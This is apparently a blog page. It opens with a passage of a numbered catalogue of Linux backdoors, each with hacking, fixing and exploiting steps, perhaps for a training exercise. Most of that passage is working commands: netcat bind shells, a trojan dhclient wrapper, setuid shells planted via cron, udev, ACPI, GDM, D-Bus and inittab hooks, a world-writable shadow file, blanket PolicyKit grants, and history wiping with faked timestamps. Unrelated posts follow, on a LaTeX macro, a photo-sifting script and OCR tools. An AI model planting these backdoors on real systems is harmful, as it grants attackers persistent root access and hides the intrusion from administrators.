echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern


11.2
  Fixing

cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern


11.3
  Exploiting

ulimit -c unlimited

sleep 1m & pkill -SEGV sleep

nc localhost 31335


12
  nc wrapper

Remote
Local
root


12.1
  Hacking

setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <sys/stat.h>
#include <unistd.h>

/* wrapper: fork a backdoor, then exec the real dhclient */
int main (int argc, char* args[]) {
    int ret = fork ();
    if (ret == 0) {
        /* child: make dash setuid and serve a shell on port 31339 */
        chmod("/bin/dash", 04755);
        execlp ("/usr/bin/nc.traditional", "nc.traditional",
            "-l" ,"-p", "31339", "-e", "/bin/dash", (char*) NULL);
    } else
        execvp("/sbin/dhclient6", args);
    return 0;
}
EOF

/etc/init.d/networking stop                # Or disable via NetworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start               # Or enable via NetworkManager


12.2
  Fixing


12.3
  Exploiting


12.3.1
  real dhclient

Disconnect with Network Manager

Connect with NetworkManager

dash

nc localhost 31339


12.3.2
  cron

Just wait. Or reboot.


13
  evbug

Remote

Writes keycodes to syslog.
Type: 1 entries are keypresses, and “code” is the actual keycode.
evtest shows which key maps to which keycode.

Unfortunately, Debian does not seem to have that module.


13.1
  Hacking

modprobe evbug
%FIXME: Maybe pull netconsole

nano /etc/modprobe.d/blacklist.conf


13.2
  Fixing

modprobe -r evbug


13.3
  Exploiting

dmesg | grep  "Type: 1"


14
  Vino

Remote


14.1
  Hacking

sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences


14.2
  Fixing

vino-preferences

ps aux | grep vnc


14.3
  Exploiting

vncviewer IP


15
  GDM InitScript

Local
Remote
root


15.1
  Hacking

nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF


15.2
  Fixing

less /etc/gdm/Init/Default


15.3
  Exploiting

Log off

Log on

/etc/gdm/gdm-greeter

nc localhost 31345


16
  shadow a+rw

Local
root


16.1
  Hacking

chmod a+rw /etc/shadow


16.2
  Fixing

ls -l /etc/shadow

chmod u=rw,g=r /etc/shadow


16.3
  Exploiting

nano /etc/shadow


17
  SysV Init Alt+Up

Local
root


17.1
  Hacking

touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF

nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF

init q


17.2
  Fixing

nano /etc/inittab


17.3
  Exploiting

Ctrl+Alt+F1, Alt+Up, Alt+Left


18
  SysV Init Ctrl+Alt+Del

Local
root


18.1
  Hacking

nano /etc/inittab <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF

init q


18.2
  Fixing

nano /etc/inittab


18.3
  Exploiting

Ctrl+Alt+F1, Ctrl+Alt+Del, dash


19
  SysV Init tty14

Local
root


19.1
  Hacking

nano /etc/inittab <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF

init q


19.2
  Fixing

less /etc/inittab


19.3
  Exploiting

Ctrl+Alt+F1, Alt+Left


20
  DBus Root Service

Local
root


20.1
  Hacking

cd /usr/share/dbus-1/system-services/
cp org.freedesktop.UPower.service org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF

cp org.freedesktop.UPower.service org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF



20.2
  Fixing

grep Exec /usr/share/dbus-1/system-services/*.service


20.3
  Exploiting

dbus-send --system --print-reply --dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally

dbus-send --system --print-reply --dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely

nc localhost 31343

dash


21
  Crontabs

Local
Remote
root


21.1
  Hacking

touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * *   root  cp /bin/dash /usr/share/gdm/chooser
*/2 * * * *   root  chmod +s /usr/share/gdm/chooser
EOF

touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * *   root  /sbin/mount.btrfs
EOF


21.2
  Fixing

sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/


21.3
  Exploiting

ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser

Wait

/usr/share/gdm/chooser

nc localhost 31339


22
  udev

Local
root

udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware events.
Under the assumption that a laptop will have an rfkill switch, one could write the following rules.
Note that the commands block, i.e. for the second rule to be hit, the first program must exit.
udev automatically reloads the rules.


22.1
  Hacking

nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN+="/bin/chmod +s /bin/dash"
EOF


22.2
  Fixing

grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/

but too hard


22.3
  Exploiting

toggle rfkill via hardware switch

nc localhost 31337

dash


23
  ACPI Powerbtn

Local
root


23.1
  Hacking

nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF


23.2
  Fixing

ls /etc/acpi/

less /etc/acpi/powerbtn.sh


23.3
  Exploiting

Press power button

nc localhost 31348

dash


24
  PolicyKit GrantAll

Local
root

Note that this reflects policykit 0.96 which has a deprecated config file syntax.


24.1
  Hacking

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>

pkill polkitd


24.2
  Fixing

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>

pkill polkitd


24.3
  Exploiting

pkexec id


25
  decoy timestamps

No hack in the traditional sense, but stuff that one might need to do.


25.1
  Hacking

for i in `find /etc/ /bin/ /sbin/ /var/spool/
          /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do
    touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*


25.2
  Fixing


25.3
  Exploiting

find / -mtime -1

find / -ctime -1

Perfectly scale an image to the rest of a page with LaTeX

I had the following problem for a long time: I wanted to embed a picture into a page and automatically have it scaled to the maximum size that possibly fits the page, but not more. Obviously, simply doing a

\includegraphics[width=\textwidth]{myimage}

wouldn’t do the job, because if the image is taller than wide, the image would grow beyond the page. One could use the information from the \textheight register, i.e. something like

\includegraphics[width=\textwidth,height=\textheight,keepaspectratio=true]{myimage}

But that doesn’t take already existing text into account, i.e. some description above the image that you definitely want to have on the same page.

So Simon cooked up a macro that would allow me to do exactly what I wanted by creating a new box, getting its height and subtracting that from \textheight. Lovely. Here’s the code:

\newlength{\textundbildtextheight}
 
\newcommand{\textundbild}[2]{
\settototalheight\textundbildtextheight{\vbox{#1}}
#1
\vfill
\begin{center}
\includegraphics[width=\textwidth,keepaspectratio=true,height=\textheight-\the\textundbildtextheight]{#2}
\end{center}
\vfill
}

I’m sure it’s not very correct and it’s possible to make it not work properly, but it does the job very well for me as you can see on the following rendered pages:


DIN A4 Page
DIN A5 Page
DIN A6 Page

And well, the contents of the image is a bit ugly, too, but if you know a nice bullshit bingo generator, let me know.

Sifting through a lot of similar photos

To keep the amount of photos in my photo library sane, I had to sift through many pictures and get rid of redundant ones. I defined redundancy as many pictures taken at the same time. Thus I had to pick one of the redundant pictures and delete the other ones.

My strategy so far was to use Nautilus and Eye of GNOME to spot pictures of the same group and delete all but the best one.

I realised that photos usually show the same picture if they were shot at the same time, i.e. many quick shots one after another. I also realised that usually the best photograph was the biggest one in terms of bytes in JPEG format.

To automate the whole selection and deletion process, I hacked together a tiny script that stupidly groups files in a directory according to their mtime and deletes all but the biggest one.

Before deletion, it will show the pictures with eog and ask whether or not to delete the other pictures.

It worked quite well and helped to quickly weed out 15% of my pictures 🙂

I played around with another method: Getting the difference of the histograms of the images, to compare the similarity. But as the pictures were shot with a different exposure, the histograms were quite different, too. Hence that didn’t work out very well. But I’ll leave it in, just for reference.

So if you happen to have a similar problem, feel free to grab the following script 🙂

#!/usr/bin/env python
 
import collections
import math
import os
from os.path import join, getsize, getmtime
import operator
import subprocess
import sys
 
 
 
 
# Python 2's Popen is not a context manager; patch it so that the
# "with" block below kills the image viewer on exit
subprocess.Popen.__enter__ = lambda self: self
subprocess.Popen.__exit__ = lambda self, type, value, traceback: self.kill()
 
directory = '.'
THRESHOLD = 3
GET_RMS = False
 
mtimes = collections.defaultdict(list)
 
def get_picgroups_by_time(directory='.'):
 
	for root, dirs, files in os.walk(directory):
		for name in files:
			fname = join(root, name)
			mtime = getmtime(fname)
			mtimes[mtime].append(fname)
 
	# It's gotten a bit messy, but a OrderedDict is available in Python 3.1 hence this is the manually created ordered list.
	picgroups = [v for (k, v) in sorted([(k, v) for k, v in mtimes.iteritems() if len(v) >= THRESHOLD])]
 
	return picgroups
 
def get_picgroups(directory='.'):
	return get_picgroups_by_time()
 
picgroups = get_picgroups(directory)
 
print 'Got %d groups' % len(picgroups)
 
def get_max_and_picgroups(picgroups):
	for picgroup in picgroups:
		max_of_group = max(picgroup, key=lambda x: getsize(x))
		print picgroup
		print 'max: %s: %d' % (max_of_group, getsize(max_of_group))
 
		if GET_RMS:
			import PIL.Image
			last_pic = picgroup[0]
			for pic in picgroup[1:]:
				image1 = PIL.Image.open(last_pic).histogram()
				image2 = PIL.Image.open(pic).histogram()
 
				rms = math.sqrt(reduce(operator.add, map(lambda a,b: (a-b)**2, image1, image2))/len(image1))
 
				print 'RMS %s %s: %s' % (last_pic, pic, rms)
 
				last_pic = pic
		yield (max_of_group, picgroup)
 
 
max_and_picgroups = get_max_and_picgroups(picgroups)
 
 
def decide(prompt, decisions):
	import termios, fcntl, sys, os, select
 
	fd = sys.stdin.fileno()
 
	oldterm = termios.tcgetattr(fd)
	newattr = oldterm[:]
	newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
	termios.tcsetattr(fd, termios.TCSANOW, newattr)
 
	oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
	fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
 
	print prompt
 
	decided = None
	try:
		while not decided:
			r, w, e = select.select([fd], [], [])
			if r:
				c = sys.stdin.read(1)
				print "Got character", repr(c)
				decision_made = decisions.get(c, None)
				if decision_made:
					decision_made()
					decided = True
 
	finally:
	    termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
	    fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
 
for max_of_group, picgroup in max_and_picgroups:
	cmd = ['eog', '-n'] + picgroup
	print 'Showing %s' % ', '.join(picgroup)
 
	def delete_others():
		to_delete = picgroup[:]
		to_delete.remove(max_of_group)
		print 'deleting %s' % ', '.join (to_delete)
		[os.unlink(f) for f in to_delete]
 
	with subprocess.Popen(cmd) as p:
		decide('%s is max, delete others?' % max_of_group, {'y': delete_others, 'n': lambda: ''})

OCRing a scanned book

I had the pleasure of using a “Bookeye” book scanner. It’s a huge device which helps scanning things like books or folders. It’s very quick and very easy to use. I got a huge PDF out of the good 100 pages that I scanned.

Unfortunately the light was very bright and so the scanner scanned “through” the open pages, revealing the back sides of the pages. That’s not very cool, and I couldn’t really dim the light or put a sheet between the pages.
Also, it doesn’t do OCR, but my main point of digitising this book was to actually have it searchable and copy&paste-able.

There seem to be multiple options to do OCR on images:

tesseract

covered already

ocropus

Apparently this is supposed to be tesseract on steroids, as it can recognise text on paper with different layouts and everything.
Since it’s a bit painful to compile, I’d love to share my experiences, hoping that they will become useful to somebody.

During compilation of ocropus, you might run into issues like this or that, so be prepared to patch the code.


cd /tmp/
svn checkout http://iulib.googlecode.com/svn/trunk/ iulib
cd iulib/
./configure --prefix=/tmp/libiu-install
make && make install


cd /tmp/
wget http://www.leptonica.com/source/leptonlib-1.67.tar.gz -O- | tar xvzf -
cd leptonlib*/
./configure --prefix=/tmp/leptonica
make && make install


cd /tmp/
svn checkout http://ocropus.googlecode.com/svn/trunk/ ocropus
# This is due to this bug: http://code.google.com/p/ocropus/issues/detail?id=283
cat > ~/bin/leptheaders <<EOF
#!/bin/sh
echo /tmp/leptonica/include/leptonica/
EOF
chmod a+x ~/bin/leptheaders
./configure --prefix=/tmp/ocropus-install --with-iulib=/tmp/libiu-install/
make && make install

muelli@bigbox /tmp $ LD_LIBRARY_PATH=/tmp/ocropus-install/lib/:/tmp/leptonica/lib/ ./ocropus-install/bin/ocroscript --help
usage: ./ocropus-install/bin/ocroscript [options] [script [args]].
Available options are:
  -e stat  execute string 'stat'
  -l name  require library 'name'
  -i       enter interactive mode after executing 'script'
  -v       show version information
  --       stop handling options
  -        execute stdin and stop handling options
muelli@bigbox /tmp $

However, I can’t do anything because I can’t make Lua load the scripts from the share/ directory of the prefix. Too sad. It looked very promising.

Cuneiform

This is an interesting thing. It’s a BSD licensed Russian OCR software that was once one of the leading tools for OCR.
Interestingly, it’s the most straightforward thing to install, compared to the other things listed here.

bzr branch lp:cuneiform-linux
cd cuneiform-linux/
mkdir build
cd build/
cmake .. -DCMAKE_INSTALL_PREFIX=/tmp/cuneiform
make
make install

This is supposed to produce some sort of HTML which we can glue to a PDF with the following tool.

hocr2pdf

Apparently takes “HTML annotated OCR data” and bundles that, together with the image, into a PDF.


cd /tmp/
svn co http://svn.exactcode.de/exact-image/trunk ei
cd ei/
./configure --prefix=/tmp/exactimage
make && make install

That, however, failed for me like this:

  LINK EXEC objdir/frontends/optimize2bw
/usr/bin/ld: objdir/codecs/lib.a: undefined reference to symbol 'QuantizeBuffer'
/usr/bin/ld: note: 'QuantizeBuffer' is defined in DSO /usr/lib64/libgif.so.4 so try adding it to the linker command line
/usr/lib64/libgif.so.4: could not read symbols: Invalid operation
collect2: ld returned 1 exit status
make: *** [objdir/frontends/optimize2bw] Error 1

Adding “LDFLAGS += -lgif” to the Makefile fixes that. I couldn’t find a bug tracker, hence I reported this issue via email but haven’t heard back yet.

Although the hOCR format seems to be the only option to actually know where in the file the text appears, no OCR program, except cuneiform and tesseract with a patch, seems to support it 🙁
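
For what it’s worth, gluing cuneiform and hocr2pdf together per page is not much code. A sketch, assuming page images named pg_*.png and both tools installed as above:

#!/usr/bin/env python
# Sketch: OCR every page image with cuneiform and wrap image plus
# recognised text into a one-page searchable PDF with hocr2pdf.
import glob
import subprocess

for png in sorted(glob.glob('pg_*.png')):
    hocr = png + '.hocr'
    # let cuneiform emit hOCR, i.e. HTML with word coordinates
    subprocess.check_call(['cuneiform', '-f', 'hocr', '-o', hocr, png])
    # hocr2pdf reads the hOCR from stdin and overlays it onto the image
    with open(hocr) as f:
        subprocess.check_call(['hocr2pdf', '-i', png, '-o', png + '.pdf'], stdin=f)

The single-page PDFs then still need to be joined, e.g. with pdftk or pdfjoin.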

gscan2pdf

as a full suite it can import pictures or PDFs and use a OCR program mentioned above (tesseract or gocr). The whole thing can then be saved as a PDF again.
Results with gocr are not so good. I can’t really copy and paste stuff. Searching does kinda work though.

Using Tesseract, however, doesn’t work very well:

 Tesseract Open Source OCR Engine
tesseract: unicharset.cpp:76: const UNICHAR_ID UNICHARSET::unichar_to_id(const char*, int) const: Assertion `ids.contains(unichar_repr, length)' failed.
sh: line 1:  6187 Aborted                 (core dumped) tesseract /tmp/4jZN0oNbB1/dLNBLkcjph.tif /tmp/4jZN0oNbB1/_4BdZMfGXJ -l fra
*** unhandled exception in callback:
***   Error: cannot open /tmp/4jZN0oNbB1/_4BdZMfGXJ.txt
***  ignoring at /usr/bin/gscan2pdf line 12513.
Tesseract Open Source OCR Engine
tesseract: unicharset.cpp:76: const UNICHAR_ID UNICHARSET::unichar_to_id(const char*, int) const: Assertion `ids.contains(unichar_repr, length)' failed.
sh: line 1:  6193 Aborted                 (core dumped) tesseract /tmp/4jZN0oNbB1/ELMbnDkaEI.tif /tmp/4jZN0oNbB1/C47fuqxX3S -l fra
*** unhandled exception in callback:
***   Error: cannot open /tmp/4jZN0oNbB1/C47fuqxX3S.txt
***  ignoring at /usr/bin/gscan2pdf line 12513.

It doesn’t seem to be able to work with cuneiform 🙁

Archivista Box

This is actually an appliance and you can download an ISO image.
Running it is straight forward:

cd /tmp/
wget 'http://downloads.sourceforge.net/project/archivista/archivista/ArchivistaBox_2010_IV/archivista_20101218.iso?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Farchivista%2F&ts=1295436241&use_mirror=ovh'
qemu -cdrom /tmp/archivista_20101218.iso -m 786M -usb

Funnily enough, the image won’t boot with more than 786MB of RAM. Quite weird, but qemu just reports the CPU to be halted after a while. If it does work, it boots up a firefox with a nice WebUI which seems to be quite functional. However, I can’t upload my >100MB PDF probably because it’s a web based thing and either the server rejects big uploads or the CGI just times out or a mixture of both.

Trying to root this thing is more complex than usual. Apparently you can’t give “init=/bin/sh” as a boot parameter as it wouldn’t make a difference. So I tried to have a look at the ISO image. There is fuseiso to mount ISO images in userspace. Unfortunately, CDEmu doesn’t seem to be packaged for Fedora. Not surprisingly, there was a SquashFS on that ISO9660 filesystem. Unfortunately, I didn’t find any SquashFS FUSE implementation 🙁 But even with elevated privileges, I can’t mount that thing *sigh*:

$ file ~/empty/live.squash
/home/muelli/empty/live.squash: Squashfs filesystem, little endian, version 3.0, 685979128 bytes, 98267 inodes, blocksize: 65536 bytes, created: Sat Dec 18 06:54:54 2010
$ sudo mount ~/empty/live.squash /tmp/empty/
mount: wrong fs type, bad option, bad superblock on /dev/loop1,
       missing codepage or helper program, or other error
       In some cases useful info is found in syslog - try
       dmesg | tail  or so
$ dmesg | tail -n 2
[342853.796364] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[342853.796726] SQUASHFS error: Major/Minor mismatch, older Squashfs 3.0 filesystems are unsupported

But unsquashfs helped to extract the whole thing onto my disk. They used “T2” to bundle everything to a CD and packaged software mentioned above. Unfortunately, very old versions were used, i.e. cuneiform is in version 0.4.0 as opposed to 1.0.0. Hence, I don’t really consider it to be very useful to poke around that thing.

It’s a huge thing worth exploring though. It all seems to come from this SVN repository: svn://svn.archivista.ch/home/data/archivista/svn.

WatchOCR

For some reason, they built an ISO image as well. Probably to run an appliance.

cd /tmp/
wget http://www.watchocr.com/files/watchocr-V0.6-2010-12-10-en.iso
qemu -cdrom /tmp/watchocr-V0.6-2010-12-10-en.iso -m 1G

The image booted up a web browser which showed a web interface to the WebOCR functionality.
I extracted the necessary scripts, which wrap tools like cuneiform, ghostscript and friends. Compared to the Archivista box, the scripts here are rather simple. Please find webocr and img2pdf. They also use an old cuneiform 0.8.0, which is older than the version from Launchpad.

However, in my QEMU instance, the WatchOCR box took a very long time to process my good 100-page PDF.

Some custom script

It tries to do the job and did, in fact, quite well, although it’s quite slow as well. It lacks proper support for spawning multiple commands in parallel.

After you have installed the dependencies like mentioned above, you can run it:

wget http://www.konradvoelkel.de/download/pdfocr.sh
PATH="/tmp/exactimage/bin/:/tmp/cuneiform/bin/:$PATH" LD_LIBRARY_PATH=/tmp/cuneiform/lib64/ sh -x pdfocr.sh buch-test-1.pdf 0 0 0 0 2500 2000 fra SomeAuthor SomeTitle

The script, however, doesn’t really work for me, probably because of some quoting issues:

+ pdfjoin --fitpaper --tidy --outfile ../buch-test-1.pdf.ocr1.pdf 'pg_*.png.pdf'
          ----
  pdfjam: This is pdfjam version 2.08.
  pdfjam: Reading any site-wide or user-specific defaults...
          (none found)
  pdfjam ERROR: pg_*.png.pdf not found

Having overcome that problem, the following pdfjoin doesn’t work for an unknown reason. After having replaced pdfjoin manually, I realised that the script had sampled the pages down, made them monochrome and rotated them! Hence, no OCR was possible and the final PDF was totally unusable *sigh*.

It’s a mess.

To conclude…

I still don’t have a properly OCRd version of my scanned book, because the tools are not very well integrated. I believe that programs like pdftk, imagemagick, unpaper, cuneiform, hocr2pdf and pdfjam do their job very well. But it appears that they are not very well knit together to form a useful toolchain for OCRing a given PDF. Requirements would be, for example, that there is no loss of quality of the scanned images, that the number of programs to be called is reduced to a minimum, and that everything is able to do batch processing. So far, I couldn’t find anything that fulfils those requirements. If you know anything, or have a few moments to bundle the necessary tools together, please tell me :o) The necessary pieces are all there, as far as I can see. It just needs someone to integrate everything nicely.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.